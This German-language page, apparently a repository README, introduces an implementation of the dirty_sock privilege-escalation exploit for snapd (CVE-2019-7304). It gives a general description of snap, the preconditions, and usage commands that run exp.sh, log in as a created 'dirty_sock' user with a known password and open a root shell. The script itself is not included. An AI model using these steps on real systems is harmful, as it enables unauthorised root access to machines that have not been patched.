
Eine weitere Implementierung für einen Linux-Privilege-Escalation-Exploit über snap(d) (CVE-2019-7304)
Eine weitere Implementierung für einen Linux-Privilege-Escalation-Exploit über snap(d) (CVE-2019-7304)
Snap ist ein System zur Software-Paketverwaltung und Bereitstellung, das von Canonical für die Betriebssysteme entwickelt wurde, die den Linux-Kernel verwenden. Die Pakete, snaps genannt, und das Werkzeug zu ihrer Verwendung, snapd, funktionieren mit einer Reihe von Linux-Distributionen und ermöglichen es Upstream-Softwareentwicklern, ihre Anwendungen direkt an Benutzer zu verteilen. Snaps sind eigenständige Anwendungen, die in einer Sandbox mit vermitteltem Zugriff auf das Hostsystem laufen. Snap wurde ursprünglich für Cloud-Anwendungen[1] veröffentlicht, später jedoch auch für Internet der Dinge-Geräte[3][4] und Desktop[5][6] Anwendungen portiert.
dirty_sock: Linux-Privilege-Escalation (über snapd)
- snap auf dem System installiert
- du hast sudo mit oder ohne Passwort für snap
./exp.sh "snap_path" "pwd"
ex:
./exp.sh "/usr/bin/snap" "/home/evil"
danach kannst du Folgendes verwenden
su - dirty_sock
dirty_sock (as password)
sudo bash